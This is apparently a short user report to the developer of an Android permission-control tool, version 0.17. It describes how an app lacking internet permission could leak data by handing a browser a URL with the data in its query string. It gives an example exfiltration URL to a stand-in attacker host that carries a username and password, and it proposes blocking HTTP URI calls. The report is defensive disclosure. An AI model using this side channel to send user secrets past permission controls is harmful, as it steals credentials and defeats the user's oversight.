It's possible to send data without the internet permission, if you make a URL containing the data to send, and send that to a server listening for a GET request.

ie. an app can request a browser to the URI of "www.nastyhacker.example.org/leechdata.php?datatoleech=UserName%20T0ps3cr3tP4ssw0rd" or similar...

I suggest if an app doesn't have internet permission, it gets blocked from calling HTTP URIs

Version 0.17